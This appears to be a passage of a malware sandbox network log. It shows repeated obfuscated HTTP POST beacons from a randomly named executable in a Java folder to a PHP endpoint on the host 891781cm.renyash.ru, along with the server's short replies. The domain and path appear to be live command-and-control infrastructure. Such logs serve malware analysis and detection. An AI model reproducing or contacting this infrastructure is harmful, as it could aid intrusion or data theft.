                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wLZYpwD7RPAamt2fM8iNZ%2F%2BNIAPzOLNC5QqAuriraFEiji9EWuP9HLmCK9m%2BCWPaWjCRqsE6H5vA6oui9PLU7TyhcqWzlk6B9Necqj1F%2BUSeyaVVSqmAhAwR8htPU60kybWZcQG8"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c756ad880dc-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4136&min_rtt=1736&rtt_var=5451&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=69736&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  45192.168.2.449786104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:43.857980013 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:44.212551117 CET1072OUTData Raw: 50 52 58 56 5f 5c 51 5c 55 5a 54 59 51 59 55 56 58 58 5c 59 59 51 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PRXV_\Q\UZTYQYUVXX\YYQR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(/2 1$.))X3X'4=.B$X%/"'/-;<W*#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:44.306744099 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:44.568521023 CET804INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B4kgOHRrtbZHzosJOp9IIbwsahfQWJw7543wsJ4CRMDi0RY7tmSmKFV1Ga8N8KGa%2FYsXWyZVZsGAWnrxkOqMDueOTIzuMLioX57Mgdy%2F2IezRWAmoTJEWUQehH%2BJju1L8l05clN8"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c7a9f93c358-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4653&min_rtt=1683&rtt_var=6571&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=57378&cwnd=154&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  46192.168.2.449787104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:44.700172901 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:45.056160927 CET1072OUTData Raw: 55 56 58 56 5f 5d 51 5d 55 5a 54 59 51 5e 55 5d 58 5d 5c 5d 59 5c 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UVXV_]Q]UZTYQ^U]X]\]Y\RR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#)?!;-Y%-%]*.'Z&4P9$,%<5'?3;?U)#^!'^)3
                                                                                                                  Jan 1, 2025 15:02:45.147562027 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:45.397454977 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vkefpVxbRFKjZ9HWZndndofuJgRTkJ6zQlrdY3kjzw5m7Lo%2FXfp4m5cZShUpkOpPU2ScGf8hTT9F2frzkMZn%2FPrmpd6r%2BsBIQyC9EnyTzPC8SVjSXZfuhH%2FbBa%2FIDIrEUY1UhNgO"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c7fee81f799-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1464&rtt_var=886&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=518650&cwnd=91&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  47192.168.2.449788104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:45.533315897 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:45.885040998 CET1072OUTData Raw: 55 53 58 57 5f 5b 51 58 55 5a 54 59 51 5c 55 56 58 5f 5c 5e 59 5d 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: USXW_[QXUZTYQ\UVX_\^Y]R[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (5 ]-Y$-6*X33$!-7($Y!&<'8^(.0T=<#^!'^)
                                                                                                                  Jan 1, 2025 15:02:45.978411913 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  48192.168.2.449789104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:46.093919039 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:46.446762085 CET1796OUTData Raw: 55 57 5d 57 5a 5f 51 5d 55 5a 54 59 51 52 55 51 58 5a 5c 5f 59 5d 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UW]WZ_Q]UZTYQRUQXZ\_Y]R_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+Y.#"$.5X>#Y34W.4 ^3?*Q$0,.+=.7>#^!'^)
                                                                                                                  Jan 1, 2025 15:02:46.557146072 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:46.826323986 CET960INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:46 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ZTefyLZBGrQlVeO%2Fxi7oi%2BGI2%2B1lLeTXhvq6sNUz%2B99AUEhP%2B7uJkLQc1UNH9vY8lTT2%2B4pRwcAAuiK4FkfYzvnnJ4FowKimduftufn7xGNlv7frpoPquXNRD1Crmb886inUOK0"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c88aba97c9f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3282&min_rtt=1931&rtt_var=3428&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=114545&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 1f 30 38 38 00 3c 3d 3d 04 2f 3c 20 0c 31 2c 2a 5c 27 1e 0d 03 24 3e 31 1b 2d 28 33 03 3f 15 3f 5a 26 04 29 59 23 1f 0f 01 31 26 2e 5d 04 1d 25 59 3f 29 3e 5c 3c 06 39 59 29 0c 02 5d 24 37 20 04 31 24 0e 59 27 3d 25 03 20 32 23 1e 33 0a 30 52 3c 07 0e 03 33 2e 26 50 21 3a 2e 57 0d 12 22 51 24 3d 3d 53 29 0f 28 54 22 12 30 0d 27 2f 24 0e 33 02 30 1d 34 01 2d 0d 29 2c 30 5a 22 27 0b 1d 24 5c 3f 13 22 3a 3d 5d 35 23 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"088<==/< 1,*\'$>1-(3??Z&)Y#1&.]%Y?)>\<9Y)]$7 1$Y'=% 2#30R<3.&P!:.W"Q$==S)(T"0'/$304-),0Z"'$\?":=]5#"T /T=VO0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  49192.168.2.449790104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:46.215948105 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:46.571728945 CET1072OUTData Raw: 50 56 58 56 5a 58 51 5b 55 5a 54 59 51 52 55 5d 58 5d 5c 55 59 56 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PVXVZXQ[UZTYQRU]X]\UYVRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#?*#)%&*X03T.78$3,'8-7(=(R>#^!'^)
                                                                                                                  Jan 1, 2025 15:02:46.699248075 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:46.870839119 CET804INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:46 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DSphefX1ChMsQ%2FbC%2B0OVDLvgcxC08lfkxCzH396BMSpqs4vqGdmypp1ffWCabcwowXLPWQWXgVFo01V9wZTjDBjnhY3dHgLeKGONdIRDOBEhUZqMHMpbtqWp25byORCN%2F0FSo9f3"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c899a9943d5-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5034&min_rtt=2151&rtt_var=6574&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=57888&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  50192.168.2.449791104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:46.998256922 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:47.353056908 CET1072OUTData Raw: 50 51 58 5d 5f 59 51 5d 55 5a 54 59 51 5c 55 55 58 5a 5c 5e 59 52 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PQX]_YQ]UZTYQ\UUXZ\^YRRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+-Y78:%X*)>'3$*T9 ]',5$</-#+X')#^!'^)
                                                                                                                  Jan 1, 2025 15:02:47.490968943 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:47.753341913 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:47 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0uqjJpViOUWUDVTCXnI0BVRwbadmKmptMXwddjztrGOjQJDisW14Tn%2F8%2FlT%2BFBJMpbUm3C3nGfRFJLzpSCtyZyxn4BxxhMcPqhxw5R29gGv2bO871iisYswsqqt53zMx4IFHc5Rx"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c8e8dc6420d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=24971&min_rtt=22068&rtt_var=14082&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=32233&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  51192.168.2.449792104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:47.890340090 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:48.243859053 CET1072OUTData Raw: 50 55 5d 54 5a 57 54 5a 55 5a 54 59 51 5c 55 50 58 5c 5c 5e 59 53 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PU]TZWTZUZTYQ\UPX\\^YSRX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ]<4;"%=6*.,$'&U.4(^$"U&</-<_==8U=#^!'^)
                                                                                                                  Jan 1, 2025 15:02:48.335396051 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:48.590187073 CET804INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yHpIx4pBIw79tiudn1aYqW0ZTL1Ixphia9Kk9vtBW1bVledTHhw9egGYafgYRJRdNmiGUmBic9nUZmZzwPZIqVbOg36%2Bj2l423tasGYqJzISsgbC%2BViaxq9PUuhG%2BGdqPIrIHD7H"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c93c95e9e1a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2052&min_rtt=1971&rtt_var=902&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=556826&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  52192.168.2.449793104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:48.741611958 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:49.087496042 CET1072OUTData Raw: 50 52 5d 53 5f 59 51 5b 55 5a 54 59 51 53 55 52 58 5d 5c 5f 59 50 52 5d 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PR]S_YQ[UZTYQSURX]\_YPR]][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(/=]4892&*+^0$U.$0,.3<,8.#(8V><#^!'^)
                                                                                                                  Jan 1, 2025 15:02:49.256752968 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:49.520925045 CET804INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:49 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ptZvdwPg8uBkXs%2BMOnPOFZERk4ogwEp96HQIwuAiDaNE47kvvrSs7PFO4k3hywLt%2FBooqviWzmAJTQ3dBVDj%2BQDEV4QtfwReBKdS6Cwj8Ku4o1vQ04HE9Ebeledui8AF1Xmw2BMe"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c998f880f7d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3467&min_rtt=1639&rtt_var=4272&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=89746&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  53192.168.2.449794104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:49.663285017 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:50.009284019 CET1072OUTData Raw: 55 56 58 53 5a 5a 51 54 55 5a 54 59 51 5d 55 54 58 52 5c 55 59 5c 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UVXSZZQTUZTYQ]UTXR\UY\R[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ Y<?)X48-&"=.Y$-.43$,<,]=- W)#^!'^)?
                                                                                                                  Jan 1, 2025 15:02:50.135163069 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:50.383744955 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lXJcXfxoa0SV%2FP%2BLcBK1KjkyWKIMjYyx4KjQwyZu8b5%2BfodBKeNFooKbERNxazGtf6aI335EETfHt9xBrQoKpz7LPe0X1hZfz9s%2BIZHJxE6ZmcmpPbZZJTfkK5DmBalTr3cz5PbB"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c9f0c94f3bb-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
